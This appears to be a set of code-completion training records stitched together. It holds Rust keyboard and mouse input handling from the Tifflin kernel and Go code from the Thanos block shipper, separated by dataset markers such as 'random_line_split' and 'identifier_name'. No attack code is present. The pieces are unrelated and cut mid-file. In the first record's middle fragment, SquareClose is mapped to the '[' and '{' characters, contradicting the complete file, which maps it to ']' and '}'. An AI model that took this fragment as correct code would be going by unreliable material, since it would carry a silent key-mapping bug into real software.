KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"), | KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) { self.0.fetch_or(1, Ordering::Relaxed); }
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
} | KeyCode::SquareClose => shift!(self: "[", "{"),
KeyCode::Backslash => shift!(self: "\\","|"), | random_line_split |
mod.rs | // "Tifflin" Kernel
// - By John Hodge (thePowersGang)
//
// Core/gui/input/mod.rs
//! GUI input management
#[allow(unused_imports)]
use kernel::prelude::*;
use self::keyboard::KeyCode;
use core::sync::atomic::{Ordering,AtomicUsize,AtomicU8};
use kernel::sync::Mutex;
pub mod keyboard;
pub mod mouse;
#[derive(Debug)]
pub enum Event
{
KeyDown(keyboard::KeyCode),
KeyUp(keyboard::KeyCode),
KeyFire(keyboard::KeyCode),
Text([u8; 6]), // 6 bytes, as that can fit in a u64 with a 16-bit tag
MouseMove(u32,u32,i16,i16),
MouseDown(u32,u32,u8),
MouseUp(u32,u32,u8),
MouseClick(u32,u32, u8, u8),
}
struct ModKeyPair(AtomicUsize);
struct MouseCursor {
graphics_cursor: ::kernel::sync::Mutex<::kernel::metadevs::video::CursorHandle>,
}
struct InputChannel
{
//caps_active: AtomicBool, // Go DIAF capslock
shift_held: ModKeyPair,
ctrl_held: ModKeyPair,
alt_held: ModKeyPair,
//altgr: ModKeyPair, // AltGr is usually just one... but meh
last_key_pressed: AtomicU8,
//active_repeat: AtomicValue<u8>,
//repeat_start: Timestamp,
cursor: MouseCursor,
// TODO: Mutex feels too heavy, but there may be multiple mice on one channel
double_click_info: Mutex<MouseClickInfo>,
}
struct MouseClickInfo
{
button: u8,
count: u8,
time: ::kernel::time::TickCount,
x: u32,
y: u32,
}
//struct IMEState
//{
// ime_ofs: u8,
// ime_val: u32,
//}
/// Maximum time in kernel ticks between subsequent press/release events for a click/doubleclick
const DOUBLE_CLICK_TIMEOUT: u64 = 500; // 500ms
/// Maximum distance along any axis between press/release before a click is not registered
const MAX_CLICK_MOVE: u32 = 10;
static MAIN_INPUT: InputChannel = InputChannel::new();
pub fn init() {
//MAIN_INPUT.cursor.
}
fn get_channel_by_index(_idx: usize) -> &'static InputChannel {
&MAIN_INPUT
}
impl InputChannel
{
const fn new() -> InputChannel {
InputChannel {
shift_held: ModKeyPair::new(),
ctrl_held: ModKeyPair::new(),
alt_held: ModKeyPair::new(),
//altgr: ModKeyPair::new(),
cursor: MouseCursor::new(),
last_key_pressed: AtomicU8::new(KeyCode::None as u8),
double_click_info: Mutex::new(MouseClickInfo::new()),
}
}
pub fn handle_key(&self, key: keyboard::KeyCode, release: bool)
{
log_trace!("key={:?}, release={}", key, release);
match (release, key)
{
// Maintain key states
(false, KeyCode::RightShift) => self.shift_held.set_r(),
(false, KeyCode::LeftShift) => self.shift_held.set_l(),
(false, KeyCode::RightCtrl) => self.ctrl_held.set_r(),
(false, KeyCode::LeftCtrl) => self.ctrl_held.set_l(),
(false, KeyCode::RightAlt) => self.alt_held.set_r(),
(false, KeyCode::LeftAlt) => self.alt_held.set_l(),
(true, KeyCode::RightShift) => self.shift_held.clear_r(),
(true, KeyCode::LeftShift) => self.shift_held.clear_l(),
(true, KeyCode::RightCtrl) => self.ctrl_held.clear_r(),
(true, KeyCode::LeftCtrl) => self.ctrl_held.clear_l(),
(true, KeyCode::RightAlt) => self.alt_held.clear_r(),
(true, KeyCode::LeftAlt) => self.alt_held.clear_l(),
// Check for session change commands, don't propagate if they fired
// - 'try_change_session' checks for the required modifier keys and permissions
// TODO: Should this be handled by the `windows` module?
(false, KeyCode::Esc) => if self.try_change_session(0) { return ; },
(false, KeyCode::F1) => if self.try_change_session(1) { return ; },
(false, KeyCode::F2) => if self.try_change_session(2) { return ; },
(false, KeyCode::F3) => if self.try_change_session(3) { return ; },
(false, KeyCode::F4) => if self.try_change_session(4) { return ; },
(false, KeyCode::F5) => if self.try_change_session(5) { return ; },
(false, KeyCode::F6) => if self.try_change_session(6) { return ; },
(false, KeyCode::F7) => if self.try_change_session(7) { return ; },
(false, KeyCode::F8) => if self.try_change_session(8) { return ; },
(false, KeyCode::F9) => if self.try_change_session(9) { return ; },
(false, KeyCode::F10) => if self.try_change_session(10) { return ; },
(false, KeyCode::F11) => if self.try_change_session(11) { return ; },
(false, KeyCode::F12) => if self.try_change_session(12) { return ; },
_ => {},
}
let last_key = self.last_key_pressed.load(Ordering::Relaxed);
if !release {
self.last_key_pressed.store(key as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyDown(key));
}
// Handle fire and text events
if key.is_modifier()
{
// Only fire a modifier on key-up IF they were the last one pressed
// - This allows "Gui" (windows) to fire on key-up while still being used as a modifier
if release && last_key == key as u8
{
super::windows::handle_input( Event::KeyFire(key) );
}
}
else
{
// TODO: Support repetition (of the last non-modifier pressed)
if !release
{
super::windows::handle_input( Event::KeyFire(key) );
// TODO: Should only generate text if no non-shift modifiers are depressed
//if self.enable_input_translation {
let s = self.get_input_string(key);
if s.len() > 0 {
let mut buf = [0; 6];
buf[.. s.len()].clone_from_slice( s.as_bytes() );
super::windows::handle_input( Event::Text(buf) );
}
//}
}
}
// Send key combination to the active window (via the window subsystem)
if release {
self.last_key_pressed.store(KeyCode::None as u8, Ordering::Relaxed);
super::windows::handle_input(/*self, */Event::KeyUp(key));
}
}
pub fn handle_mouse_set(&self, norm_x: u16, norm_y: u16)
{
// Mouse movement, update cursor
let (dx,dy) = self.cursor.set_pos(norm_x, norm_y);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx as i16, dy as i16));
}
pub fn handle_mouse_move(&self, dx: i16, dy: i16)
{
// Mouse movement, update cursor
self.cursor.move_pos(dx as i32, dy as i32);
let (x,y) = self.cursor.pos();
self.double_click_info.lock().clear();
super::windows::handle_input(/*self, */Event::MouseMove(x, y, dx, dy));
}
pub fn handle_mouse_btn(&self, btn: u8, release: bool)
{
let (x,y) = self.cursor.pos();
if release
{
// Released - check the double-click timer
if let Some(ev) = self.double_click_info.lock().check( x,y, btn )
{
super::windows::handle_input(/*self, */ev);
}
super::windows::handle_input(/*self, */Event::MouseUp(x, y, btn));
}
else
{
// Pressed - reset the double-click timer
self.double_click_info.lock().reset(x,y, btn);
super::windows::handle_input(/*self, */Event::MouseDown(x, y, btn));
}
}
fn | (&self) -> bool {
self.shift_held.get()
}
fn upper(&self) -> bool {
self.shift()
}
fn get_input_string(&self, keycode: KeyCode) -> &str
{
macro_rules! shift { ($s:ident: $lower:expr, $upper:expr) => { if $s.shift() { $upper } else {$lower} }; }
macro_rules! alpha { ($s:ident: $lower:expr, $upper:expr) => { if $s.upper() { $upper } else {$lower} }; }
match keycode
{
KeyCode::A => alpha!(self: "a", "A"),
KeyCode::B => alpha!(self: "b", "B"),
KeyCode::C => alpha!(self: "c", "C"),
KeyCode::D => alpha!(self: "d", "D"),
KeyCode::E => alpha!(self: "e", "E"),
KeyCode::F => alpha!(self: "f", "F"),
KeyCode::G => alpha!(self: "g", "G"),
KeyCode::H => alpha!(self: "h", "H"),
KeyCode::I => alpha!(self: "i", "I"),
KeyCode::J => alpha!(self: "j", "J"),
KeyCode::K => alpha!(self: "k", "K"),
KeyCode::L => alpha!(self: "l", "L"),
KeyCode::M => alpha!(self: "m", "M"),
KeyCode::N => alpha!(self: "n", "N"),
KeyCode::O => alpha!(self: "o", "O"),
KeyCode::P => alpha!(self: "p", "P"),
KeyCode::Q => alpha!(self: "q", "Q"),
KeyCode::R => alpha!(self: "r", "R"),
KeyCode::S => alpha!(self: "s", "S"),
KeyCode::T => alpha!(self: "t", "T"),
KeyCode::U => alpha!(self: "u", "U"),
KeyCode::V => alpha!(self: "v", "V"),
KeyCode::W => alpha!(self: "w", "W"),
KeyCode::X => alpha!(self: "x", "X"),
KeyCode::Y => alpha!(self: "y", "Y"),
KeyCode::Z => alpha!(self: "z", "Z"),
KeyCode::SquareOpen => shift!(self: "[", "{"),
KeyCode::SquareClose => shift!(self: "]", "}"),
KeyCode::Backslash => shift!(self: "\\","|"),
KeyCode::Semicolon => shift!(self: ";", ":"),
KeyCode::Quote => shift!(self: "'", "\""),
KeyCode::Comma => shift!(self: ",", "<"),
KeyCode::Period => shift!(self: ".", ">"),
KeyCode::Slash => shift!(self: "/", "?"),
KeyCode::Kb1 => shift!(self: "1", "!"),
KeyCode::Kb2 => shift!(self: "2", "@"),
KeyCode::Kb3 => shift!(self: "3", "#"),
KeyCode::Kb4 => shift!(self: "4", "$"),
KeyCode::Kb5 => shift!(self: "5", "%"),
KeyCode::Kb6 => shift!(self: "6", "^"),
KeyCode::Kb7 => shift!(self: "7", "&"),
KeyCode::Kb8 => shift!(self: "8", "*"),
KeyCode::Kb9 => shift!(self: "9", "("),
KeyCode::Kb0 => shift!(self: "0", ")"),
KeyCode::Minus => shift!(self: "-", "_"),
KeyCode::Equals => shift!(self: "=", "+"),
KeyCode::Space => " ",
_ => "",
}
}
fn try_change_session(&self, target: usize) -> bool {
if self.is_master() && self.ctrl_held.get() && self.alt_held.get() {
super::windows::switch_active(target);
true
}
else {
false
}
}
fn is_master(&self) -> bool { true }
}
impl ModKeyPair {
const fn new() -> ModKeyPair {
ModKeyPair(AtomicUsize::new(0))
}
fn set_l(&self) { self.0.fetch_or(1, Ordering::Relaxed); }
fn set_r(&self) { self.0.fetch_or(2, Ordering::Relaxed); }
fn clear_l(&self) { self.0.fetch_and(!1, Ordering::Relaxed); }
fn clear_r(&self) { self.0.fetch_and(!2, Ordering::Relaxed); }
fn get(&self) -> bool {
self.0.load(Ordering::Relaxed) != 0
}
}
impl MouseCursor {
const fn new() -> MouseCursor {
MouseCursor {
graphics_cursor: ::kernel::sync::Mutex::new(::kernel::metadevs::video::CursorHandle::new()),
}
}
fn add_coord(cur: u32, d: i32) -> u32 {
if d < 0 {
u32::saturating_sub(cur, -d as u32)
}
else {
u32::saturating_add(cur, d as u32)
}
}
/// Set cursor position to normalised coordinates
fn set_pos(&self, norm_x: u16, norm_y: u16) -> (i32, i32) {
let mut lh = self.graphics_cursor.lock();
let pos = lh.get_pos();
let rect = match ::kernel::metadevs::video::get_display_for_pos(pos)
{
Ok(v) => v,
Err(v) => v,
};
let new_pos = ::kernel::metadevs::video::Pos {
x: rect.x() + ((rect.w() as u64 * norm_x as u64) >> 16) as u32,
y: rect.y() + ((rect.h() as u64 * norm_y as u64) >> 16) as u32,
};
lh.set_pos(new_pos);
(
(new_pos.x as i32 - pos.x as i32) as i32,
(new_pos.y as i32 - pos.y as i32) as i32,
)
}
fn move_pos(&self, dx: i32, dy: i32) {
let mut lh = self.graphics_cursor.lock();
let mut pos = lh.get_pos();
pos.x = Self::add_coord(pos.x, dx);
pos.y = Self::add_coord(pos.y, dy);
lh.set_pos(pos);
}
fn pos(&self) -> (u32,u32) {
let pos = self.graphics_cursor.lock().get_pos();
(pos.x, pos.y)
}
}
impl MouseClickInfo
{
const fn new() -> MouseClickInfo {
MouseClickInfo {
button: 0xFF, x: 0, y: 0,
time: 0,
count: 0,
}
}
fn clear(&mut self)
{
self.button = 0xFF;
}
fn reset(&mut self, x: u32, y: u32, button: u8)
{
self.button = button;
self.count = 0;
self.x = x;
self.y = y;
self.time = ::kernel::time::ticks();
}
fn check(&mut self, x: u32, y: u32, button: u8) -> Option<Event>
{
use kernel::lib::num::abs_diff;
if self.button != button {
self.clear();
None
}
else if (::kernel::time::ticks() - self.time) > DOUBLE_CLICK_TIMEOUT {
self.clear();
None
}
else if abs_diff(self.x, x) > MAX_CLICK_MOVE || abs_diff(self.y, y) > MAX_CLICK_MOVE {
self.clear();
None
}
else {
self.time = ::kernel::time::ticks();
self.x = x;
self.y = y;
if self.count < 0xFF {
self.count += 1;
}
Some( Event::MouseClick(x, y, button, self.count) )
}
}
}
| shift | identifier_name |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promauto"
"github.com/prometheus/prometheus/model/labels"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/fileutil"
"github.com/thanos-io/objstore"
"github.com/thanos-io/thanos/pkg/block"
"github.com/thanos-io/thanos/pkg/block/metadata"
"github.com/thanos-io/thanos/pkg/runutil"
)
type metrics struct {
dirSyncs prometheus.Counter
dirSyncFailures prometheus.Counter
uploads prometheus.Counter
uploadFailures prometheus.Counter
uploadedCompacted prometheus.Gauge
}
func newMetrics(reg prometheus.Registerer) *metrics {
var m metrics
m.dirSyncs = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_syncs_total",
Help: "Total number of dir syncs",
})
m.dirSyncFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_dir_sync_failures_total",
Help: "Total number of failed dir syncs",
})
m.uploads = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_uploads_total",
Help: "Total number of uploaded blocks",
})
m.uploadFailures = promauto.With(reg).NewCounter(prometheus.CounterOpts{
Name: "thanos_shipper_upload_failures_total",
Help: "Total number of block upload failures",
})
m.uploadedCompacted = promauto.With(reg).NewGauge(prometheus.GaugeOpts{
Name: "thanos_shipper_upload_compacted_done",
Help: "If 1 it means shipper uploaded all compacted blocks from the filesystem.",
})
return &m
}
// Shipper watches a directory for matching files and directories and uploads
// them to a remote data store.
type Shipper struct {
logger log.Logger
dir string
metrics *metrics
bucket objstore.Bucket
source metadata.SourceType
uploadCompactedFunc func() bool
allowOutOfOrderUploads bool
hashFunc metadata.HashFunc
labels func() labels.Labels
mtx sync.RWMutex
}
// New creates a new shipper that detects new TSDB blocks in dir and uploads them to
// remote if necessary. It attaches the Thanos metadata section in each meta JSON file.
// If uploadCompacted is enabled, it also uploads compacted blocks which are already in filesystem.
func New(
logger log.Logger,
r prometheus.Registerer,
dir string,
bucket objstore.Bucket,
lbls func() labels.Labels,
source metadata.SourceType,
uploadCompactedFunc func() bool,
allowOutOfOrderUploads bool,
hashFunc metadata.HashFunc,
) *Shipper {
if logger == nil {
logger = log.NewNopLogger()
}
if lbls == nil {
lbls = func() labels.Labels { return nil }
}
if uploadCompactedFunc == nil {
uploadCompactedFunc = func() bool {
return false
}
}
return &Shipper{
logger: logger,
dir: dir,
bucket: bucket,
labels: lbls,
metrics: newMetrics(r),
source: source,
allowOutOfOrderUploads: allowOutOfOrderUploads,
uploadCompactedFunc: uploadCompactedFunc,
hashFunc: hashFunc,
}
}
func (s *Shipper) SetLabels(lbls labels.Labels) {
s.mtx.Lock()
defer s.mtx.Unlock()
s.labels = func() labels.Labels { return lbls }
}
func (s *Shipper) getLabels() labels.Labels {
s.mtx.RLock()
defer s.mtx.RUnlock()
return s.labels()
}
// Timestamps returns the minimum timestamp for which data is available and the highest timestamp
// of blocks that were successfully uploaded.
func (s *Shipper) Timestamps() (minTime, maxSyncTime int64, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
return 0, 0, errors.Wrap(err, "read shipper meta file")
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
minTime = math.MaxInt64
maxSyncTime = math.MinInt64
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, 0, err
}
for _, m := range metas {
if m.MinTime < minTime {
minTime = m.MinTime
}
if _, ok := hasUploaded[m.ULID]; ok && m.MaxTime > maxSyncTime {
maxSyncTime = m.MaxTime
}
}
if minTime == math.MaxInt64 {
// No block yet found. We cannot assume any min block size so propagate 0 minTime.
minTime = 0
}
return minTime, maxSyncTime, nil
}
type lazyOverlapChecker struct {
synced bool
logger log.Logger
bucket objstore.Bucket
labels func() labels.Labels
metas []tsdb.BlockMeta
lookupMetas map[ulid.ULID]struct{}
}
func newLazyOverlapChecker(logger log.Logger, bucket objstore.Bucket, labels func() labels.Labels) *lazyOverlapChecker {
return &lazyOverlapChecker{
logger: logger,
bucket: bucket,
labels: labels,
lookupMetas: map[ulid.ULID]struct{}{},
}
}
func (c *lazyOverlapChecker) sync(ctx context.Context) error {
if err := c.bucket.Iter(ctx, "", func(path string) error {
id, ok := block.IsBlockDir(path)
if !ok {
return nil
}
m, err := block.DownloadMeta(ctx, c.logger, c.bucket, id)
if err != nil {
return err
}
if !labels.Equal(labels.FromMap(m.Thanos.Labels), c.labels()) {
return nil
}
c.metas = append(c.metas, m.BlockMeta)
c.lookupMetas[m.ULID] = struct{}{}
return nil
}); err != nil {
return errors.Wrap(err, "get all block meta.")
}
c.synced = true
return nil
}
func (c *lazyOverlapChecker) IsOverlapping(ctx context.Context, newMeta tsdb.BlockMeta) error {
if !c.synced {
level.Info(c.logger).Log("msg", "gathering all existing blocks from the remote bucket for check", "id", newMeta.ULID.String())
if err := c.sync(ctx); err != nil {
return err
}
}
// TODO(bwplotka) so confusing! we need to sort it first. Add comment to TSDB code.
metas := append([]tsdb.BlockMeta{newMeta}, c.metas...)
sort.Slice(metas, func(i, j int) bool {
return metas[i].MinTime < metas[j].MinTime
})
if o := tsdb.OverlappingBlocks(metas); len(o) > 0 {
// TODO(bwplotka): Consider checking if overlaps relates to block in concern?
return errors.Errorf("shipping compacted block %s is blocked; overlap spotted: %s", newMeta.ULID, o.String())
}
return nil
}
// Sync performs a single synchronization, which ensures all non-compacted local blocks have been uploaded
// to the object bucket once.
//
// If uploadCompacted is enabled, it also uploads compacted blocks that are already on the filesystem.
//
// It is not concurrency-safe, however it is compactor-safe (running concurrently with compactor is ok).
func (s *Shipper) | (ctx context.Context) (uploaded int, err error) {
meta, err := ReadMetaFile(s.dir)
if err != nil {
// If we encounter any error, proceed with an empty meta file and overwrite it later.
// The meta file is only used to avoid unnecessary bucket.Exists calls,
// which are properly handled by the system if they occur anyway.
if !os.IsNotExist(err) {
level.Warn(s.logger).Log("msg", "reading meta file failed, will override it", "err", err)
}
meta = &Meta{Version: MetaVersion1}
}
// Build a map of blocks we already uploaded.
hasUploaded := make(map[ulid.ULID]struct{}, len(meta.Uploaded))
for _, id := range meta.Uploaded {
hasUploaded[id] = struct{}{}
}
// Reset the uploaded slice so we can rebuild it only with blocks that still exist locally.
meta.Uploaded = nil
var (
checker = newLazyOverlapChecker(s.logger, s.bucket, s.getLabels)
uploadErrs int
)
uploadCompacted := s.uploadCompactedFunc()
metas, err := s.blockMetasFromOldest()
if err != nil {
return 0, err
}
for _, m := range metas {
// Do not sync a block if we already uploaded or ignored it. If it's no longer found in the bucket,
// it was generally removed by the compaction process.
if _, uploaded := hasUploaded[m.ULID]; uploaded {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
if m.Stats.NumSamples == 0 {
// Ignore empty blocks.
level.Debug(s.logger).Log("msg", "ignoring empty block", "block", m.ULID)
continue
}
// We only ship the first compacted block level as the normal flow.
if m.Compaction.Level > 1 {
if !uploadCompacted {
continue
}
}
// Check against bucket if the meta file for this block exists.
ok, err := s.bucket.Exists(ctx, path.Join(m.ULID.String(), block.MetaFilename))
if err != nil {
return 0, errors.Wrap(err, "check exists")
}
if ok {
meta.Uploaded = append(meta.Uploaded, m.ULID)
continue
}
// Skip overlap check if out of order uploads is enabled.
if m.Compaction.Level > 1 && !s.allowOutOfOrderUploads {
if err := checker.IsOverlapping(ctx, m.BlockMeta); err != nil {
return 0, errors.Errorf("Found overlap or error during sync, cannot upload compacted block, details: %v", err)
}
}
if err := s.upload(ctx, m); err != nil {
if !s.allowOutOfOrderUploads {
return 0, errors.Wrapf(err, "upload %v", m.ULID)
}
// No error returned, just log line. This is because we want other blocks to be uploaded even
// though this one failed. It will be retried on second Sync iteration.
level.Error(s.logger).Log("msg", "shipping failed", "block", m.ULID, "err", err)
uploadErrs++
continue
}
meta.Uploaded = append(meta.Uploaded, m.ULID)
uploaded++
s.metrics.uploads.Inc()
}
if err := WriteMetaFile(s.logger, s.dir, meta); err != nil {
level.Warn(s.logger).Log("msg", "updating meta file failed", "err", err)
}
s.metrics.dirSyncs.Inc()
if uploadErrs > 0 {
s.metrics.uploadFailures.Add(float64(uploadErrs))
return uploaded, errors.Errorf("failed to sync %v blocks", uploadErrs)
}
if uploadCompacted {
s.metrics.uploadedCompacted.Set(1)
} else {
s.metrics.uploadedCompacted.Set(0)
}
return uploaded, nil
}
// upload uploads the block if it does not already exist in remote storage.
// TODO(khyatisoneji): Double check if block does not have deletion-mark.json for some reason, otherwise log it or return error.
func (s *Shipper) upload(ctx context.Context, meta *metadata.Meta) error {
level.Info(s.logger).Log("msg", "upload new block", "id", meta.ULID)
// We hard-link the files into a temporary upload directory so we are not affected
// by other operations happening against the TSDB directory.
updir := filepath.Join(s.dir, "thanos", "upload", meta.ULID.String())
// Remove updir just in case.
if err := os.RemoveAll(updir); err != nil {
return errors.Wrap(err, "clean upload directory")
}
if err := os.MkdirAll(updir, 0750); err != nil {
return errors.Wrap(err, "create upload dir")
}
defer func() {
if err := os.RemoveAll(updir); err != nil {
level.Error(s.logger).Log("msg", "failed to clean upload directory", "err", err)
}
}()
dir := filepath.Join(s.dir, meta.ULID.String())
if err := hardlinkBlock(dir, updir); err != nil {
return errors.Wrap(err, "hard link block")
}
// Attach current labels and write a new meta file with Thanos extensions.
if lset := s.getLabels(); lset != nil {
meta.Thanos.Labels = lset.Map()
}
meta.Thanos.Source = s.source
meta.Thanos.SegmentFiles = block.GetSegmentFiles(updir)
if err := meta.WriteToDir(s.logger, updir); err != nil {
return errors.Wrap(err, "write meta file")
}
return block.Upload(ctx, s.logger, s.bucket, updir, s.hashFunc)
}
// blockMetasFromOldest returns the block meta of each block found in dir
// sorted by minTime asc.
func (s *Shipper) blockMetasFromOldest() (metas []*metadata.Meta, _ error) {
fis, err := os.ReadDir(s.dir)
if err != nil {
return nil, errors.Wrap(err, "read dir")
}
names := make([]string, 0, len(fis))
for _, fi := range fis {
names = append(names, fi.Name())
}
for _, n := range names {
if _, ok := block.IsBlockDir(n); !ok {
continue
}
dir := filepath.Join(s.dir, n)
fi, err := os.Stat(dir)
if err != nil {
return nil, errors.Wrapf(err, "stat block %v", dir)
}
if !fi.IsDir() {
continue
}
m, err := metadata.ReadFromDir(dir)
if err != nil {
return nil, errors.Wrapf(err, "read metadata for block %v", dir)
}
metas = append(metas, m)
}
sort.Slice(metas, func(i, j int) bool {
return metas[i].BlockMeta.MinTime < metas[j].BlockMeta.MinTime
})
return metas, nil
}
func hardlinkBlock(src, dst string) error {
chunkDir := filepath.Join(dst, block.ChunksDirname)
if err := os.MkdirAll(chunkDir, 0750); err != nil {
return errors.Wrap(err, "create chunks dir")
}
fis, err := os.ReadDir(filepath.Join(src, block.ChunksDirname))
if err != nil {
return errors.Wrap(err, "read chunk dir")
}
files := make([]string, 0, len(fis))
for _, fi := range fis {
files = append(files, fi.Name())
}
for i, fn := range files {
files[i] = filepath.Join(block.ChunksDirname, fn)
}
files = append(files, block.MetaFilename, block.IndexFilename)
for _, fn := range files {
if err := os.Link(filepath.Join(src, fn), filepath.Join(dst, fn)); err != nil {
return errors.Wrapf(err, "hard link file %s", fn)
}
}
return nil
}
// Meta defines the format thanos.shipper.json file that the shipper places in the data directory.
type Meta struct {
Version int `json:"version"`
Uploaded []ulid.ULID `json:"uploaded"`
}
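// Example of the JSON this produces in <dir>/thanos.shipper.json (ULID value is illustrative):
//   { "version": 1, "uploaded": ["01ARZ3NDEKTSV4RRFFQ69G5FAV"] }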
const (
// MetaFilename is the known JSON filename for meta information.
MetaFilename = "thanos.shipper.json"
// MetaVersion1 represents 1 version of meta.
MetaVersion1 = 1
)
// WriteMetaFile writes the given meta into <dir>/thanos.shipper.json.
func WriteMetaFile(logger log.Logger, dir string, meta *Meta) error {
// Make any changes to the file appear atomic.
path := filepath.Join(dir, MetaFilename)
tmp := path + ".tmp"
f, err := os.Create(tmp)
if err != nil {
return err
}
enc := json.NewEncoder(f)
enc.SetIndent("", "\t")
if err := enc.Encode(meta); err != nil {
runutil.CloseWithLogOnErr(logger, f, "write meta file close")
return err
}
if err := f.Close(); err != nil {
return err
}
return renameFile(logger, tmp, path)
}
// ReadMetaFile reads the given meta from <dir>/thanos.shipper.json.
func ReadMetaFile(dir string) (*Meta, error) {
fpath := filepath.Join(dir, filepath.Clean(MetaFilename))
b, err := os.ReadFile(fpath)
if err != nil {
return nil, errors.Wrapf(err, "failed to read %s", fpath)
}
var m Meta
if err := json.Unmarshal(b, &m); err != nil {
return nil, errors.Wrapf(err, "failed to parse %s as JSON: %q", fpath, string(b))
}
if m.Version != MetaVersion1 {
return nil, errors.Errorf("unexpected meta file version %d", m.Version)
}
return &m, nil
}
func renameFile(logger log.Logger, from, to string) error {
if err := os.RemoveAll(to); err != nil {
return err
}
if err := os.Rename(from, to); err != nil {
return err
}
// Directory was renamed; sync parent dir to persist rename.
pdir, err := fileutil.OpenDir(filepath.Dir(to))
if err != nil {
return err
}
if err = fileutil.Fdatasync(pdir); err != nil {
runutil.CloseWithLogOnErr(logger, pdir, "rename file dir close")
return err
}
return pdir.Close()
}
| Sync | identifier_name |
shipper.go | // Copyright (c) The Thanos Authors.
// Licensed under the Apache License 2.0.
// Package shipper detects directories on the local file system and uploads
// them to a block storage.
package shipper
import (
"context"
"encoding/json"
"math"
"os"
"path"
"path/filepath"
"sort"
"sync"
"github.com/go-kit/log"
"github.com/go-kit/log/level"
"github.com/oklog/ulid"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
